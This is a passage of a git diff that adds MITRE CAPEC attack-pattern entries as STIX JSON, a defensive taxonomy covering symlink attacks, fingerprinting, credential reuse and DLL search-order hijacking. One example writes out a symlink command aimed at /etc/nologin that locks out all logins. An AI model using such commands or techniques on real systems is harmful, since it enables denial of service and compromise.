"REF-13" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n The attacker creates a symlink with the \"same\" name as the file which the application is intending to write to. The application will write to the file- \"causing the data to be written where the symlink is pointing\". An attack like this can be demonstrated as follows:\n root# vulprog myFile\n {...program does some processing...]\n \n attacker# ln \u2013s /etc/nologin myFile\n [...program writes to 'myFile', which points to /etc/nologin...]\n \n \n In the above example, the root user ran a program with poorly written file handling routines, providing the filename \"myFile\" to vulnprog for the relevant data to be written to. However, the attacker happened to be looking over the shoulder of \"root\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The attacker must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link." + ], + "x_capec_skills_required": { + "High": "To identify the files and create the symlinks during the file operation time window", + "Low": "To create symlinks" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a56904ba-11f7-4f46-be0a-e03fdd712290.json b/capec/attack-pattern/attack-pattern--a56904ba-11f7-4f46-be0a-e03fdd712290.json new file mode 100644 index 0000000000..562859c0b5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a56904ba-11f7-4f46-be0a-e03fdd712290.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--fea07554-2935-4669-8840-55a09b62e7d8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a56904ba-11f7-4f46-be0a-e03fdd712290", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Traditional Sources", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/408.html", + "external_id": "CAPEC-408" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a56d5738-aceb-428c-a9f3-b421d4048426.json b/capec/attack-pattern/attack-pattern--a56d5738-aceb-428c-a9f3-b421d4048426.json new file mode 100644 index 0000000000..cd3cf276fb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a56d5738-aceb-428c-a9f3-b421d4048426.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--5ecefa26-d46e-48a0-92a1-36b4091526e7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a56d5738-aceb-428c-a9f3-b421d4048426", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Traceroute Route Enumeration", + "description": "An adversary uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow the adversary to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP, but as more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/293.html", + "external_id": "CAPEC-293" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_prerequisites": [ + "A network capable of routing the attackers' packets to the destination network." + ], + "x_capec_resources_required": [ + "A command line version of traceroute or similar tool that performs route enumeration." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a68b40c0-4756-4ed8-bfec-3013dbf1a2cf.json b/capec/attack-pattern/attack-pattern--a68b40c0-4756-4ed8-bfec-3013dbf1a2cf.json new file mode 100644 index 0000000000..3a213d441d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a68b40c0-4756-4ed8-bfec-3013dbf1a2cf.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--6a6c3121-99ed-4b93-b709-bf273411bba0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a68b40c0-4756-4ed8-bfec-3013dbf1a2cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Fake the Source of Data", + "description": "An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified \"From\" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/194.html", + "external_id": "CAPEC-194" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic (By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed.)", + "Gain Privileges (By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had.)", + "Hide Activities (Faking the source of data or services can be used to create a false trail in logs as the target will associate any actions with the impersonated identity instead of the adversary.)" + ] + }, + "x_capec_prerequisites": [ + "This attack is only applicable when a vulnerable entity associates data or services with an identity. Without such an association, there would be no reason to fake the source." + ], + "x_capec_resources_required": [ + "Resources required vary depending on the nature of the attack. Possible tools needed by an attacker could include tools to create custom network packets, specific client software, and tools to capture network traffic. Many variants of this attack require no attacker resources, however." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c.json b/capec/attack-pattern/attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c.json new file mode 100644 index 0000000000..36d2db5bc8 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--19ecd473-58c2-4056-ab7d-5cdea78b16f8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Fingerprinting", + "description": "An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/224.html", + "external_id": "CAPEC-224" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A means by which to interact with the target system directly." + ], + "x_capec_resources_required": [ + "If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler." + ], + "x_capec_skills_required": { + "Medium": "Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a78ebf6a-5b2d-427c-b26a-5fc3aeab3dcd.json b/capec/attack-pattern/attack-pattern--a78ebf6a-5b2d-427c-b26a-5fc3aeab3dcd.json new file mode 100644 index 0000000000..11706a4901 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a78ebf6a-5b2d-427c-b26a-5fc3aeab3dcd.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--89e3a5e5-cfbf-4fe0-9c15-444db4d9b98e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a78ebf6a-5b2d-427c-b26a-5fc3aeab3dcd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "API Manipulation", + "description": "An adversary manipulates the use or processing of an Application Programming Interface (API) resulting in an adverse impact upon the security of the system implementing the API. This can allow the adversary to execute functionality not intended by the API implementation, possibly compromising the system which integrates the API. API manipulation can take on a number of forms including forcing the unexpected use of an API, or the use of an API in an unintended way. For example, an adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution. Another example could be API methods that should be disabled in a production application but were not, thus exposing dangerous functionality within a production environment.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/113.html", + "external_id": "CAPEC-113" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/227.html", + "external_id": "CWE-227" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target system must expose API functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the API syntax or decrypting/de-obfuscating client-server exchanges." + ], + "x_capec_resources_required": [ + "The requirements vary depending upon the nature of the API. For application-layer APIs related to the processing of the HTTP protocol, one or more of the following may be needed: a MITM (Man-In-The-Middle) proxy, a web browser, or a programming/scripting language." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a86b02ea-2d3d-48b6-be74-84cc536c3e6e.json b/capec/attack-pattern/attack-pattern--a86b02ea-2d3d-48b6-be74-84cc536c3e6e.json new file mode 100644 index 0000000000..c8a7a8acb5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a86b02ea-2d3d-48b6-be74-84cc536c3e6e.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--36146a8b-ae21-4e45-8693-2479362a5329", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a86b02ea-2d3d-48b6-be74-84cc536c3e6e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Manipulate Human Behavior", + "description": "An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary's interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary's speech and thought patterns.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/416.html", + "external_id": "CAPEC-416" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a86fe7bb-145b-4f60-b878-0b362c7fb9b0.json b/capec/attack-pattern/attack-pattern--a86fe7bb-145b-4f60-b878-0b362c7fb9b0.json new file mode 100644 index 0000000000..04efc94505 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a86fe7bb-145b-4f60-b878-0b362c7fb9b0.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--2b6ed076-cb1d-4684-b2a7-9aef508dd98c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a86fe7bb-145b-4f60-b878-0b362c7fb9b0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Consensus or Social Proof", + "description": "The adversary influences the target's actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/424.html", + "external_id": "CAPEC-424" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a8ad3a6b-76b2-4eaf-9634-33850f24463f.json b/capec/attack-pattern/attack-pattern--a8ad3a6b-76b2-4eaf-9634-33850f24463f.json new file mode 100644 index 0000000000..a745119d7d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a8ad3a6b-76b2-4eaf-9634-33850f24463f.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--0de793dd-b637-4622-82e4-e79274d23362", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a8ad3a6b-76b2-4eaf-9634-33850f24463f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Use of Known Domain Credentials", + "description": "An adversary uses stolen credentials (e.g., userid and password) to access systems managed under the same credential framework on a local network. Often, users are allowed to login to connected machines using the same password. Discovery of the password on one machine allows for lateral movement to those machines.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/560.html", + "external_id": "CAPEC-560" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--aa306f00-7aa1-4eb1-a06b-fee572bc0841.json b/capec/attack-pattern/attack-pattern--aa306f00-7aa1-4eb1-a06b-fee572bc0841.json new file mode 100644 index 0000000000..178bb6dbad --- /dev/null +++ b/capec/attack-pattern/attack-pattern--aa306f00-7aa1-4eb1-a06b-fee572bc0841.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--3f4a95b2-fba6-487b-b4c3-a8b22e251f26", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--aa306f00-7aa1-4eb1-a06b-fee572bc0841", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Drop Encryption Level", + "description": "An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/620.html", + "external_id": "CAPEC-620" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html", + "external_id": "CWE-757" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--aa81194e-410c-472c-9c6b-00a40d95ca1f.json b/capec/attack-pattern/attack-pattern--aa81194e-410c-472c-9c6b-00a40d95ca1f.json new file mode 100644 index 0000000000..6d4ee95b92 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--aa81194e-410c-472c-9c6b-00a40d95ca1f.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--a485ed1c-94ba-44dc-970b-471f104a0e44", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--aa81194e-410c-472c-9c6b-00a40d95ca1f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Active OS Fingerprinting", + "description": "An adversary engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to 'break' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/312.html", + "external_id": "CAPEC-312" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Hide Activities" + ], + "Authorization": [ + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--abd7fa33-c668-4a92-bf4a-944e7baf62af.json b/capec/attack-pattern/attack-pattern--abd7fa33-c668-4a92-bf4a-944e7baf62af.json new file mode 100644 index 0000000000..ffa7f44eed --- /dev/null +++ b/capec/attack-pattern/attack-pattern--abd7fa33-c668-4a92-bf4a-944e7baf62af.json @@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--19779707-f72f-4158-83fe-f5cb143eb7f6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--abd7fa33-c668-4a92-bf4a-944e7baf62af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "TCP SYN Ping", + "description": "An adversary uses TCP SYN packets as a means towards host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN \"synchronize\" packet by completing stage two of the 'three-way handshake' - by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST \"reset\" packet. This behavior can be used to 'ping' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response. Due to the different responses from open and closed ports, SYN packets can be used to determine the remote state of the port. A TCP SYN ping is also useful for discovering alive hosts protected by a stateful firewall. In cases where a specific firewall rule does not block access to a port, a SYN packet can pass through the firewall to the host and solicit a response from either an open or closed port. When a stateful firewall is present, SYN pings are preferable to ACK pings because a stateful firewall will typically drop all unsolicited ACK packets as they are not part of an existing or new connection. TCP SYN pings often fail when a stateless ACL or firewall is configured to blanket-filter incoming packets to a port. The firewall device will discard any SYN packets to a blocked port. Often, an adversary will alternate between SYN and ACK pings to discover if a host is alive.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/299.html", + "external_id": "CAPEC-299" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11", + "url": "http://nmap.org/docs/discovery.pdf", + "external_id": "REF-125" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The ability to send a TCP SYN packet to a remote target. Depending upon the operating system, the ability to craft SYN packets may require elevated privileges." + ], + "x_capec_resources_required": [ + "SYN pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know how to craft and send protocol commands from the command line or within a tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ad128bd2-2861-4d14-a127-2401a369742a.json b/capec/attack-pattern/attack-pattern--ad128bd2-2861-4d14-a127-2401a369742a.json new file mode 100644 index 0000000000..055c33d460 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ad128bd2-2861-4d14-a127-2401a369742a.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--410d768c-038f-47a7-b601-cc3666541bf1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ad128bd2-2861-4d14-a127-2401a369742a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Search Order Hijacking", + "description": "An adversary exploits a weakness in an application's specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary's rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect library had been loaded.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html", + "external_id": "CAPEC-471" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html", + "external_id": "CWE-427" + }, + { + "source_name": "reference_from_CAPEC", + "description": "M Trends Report, 2011, Mandiant", + "url": "https://www.mandiant.com", + "external_id": "REF-409" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.", + "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the 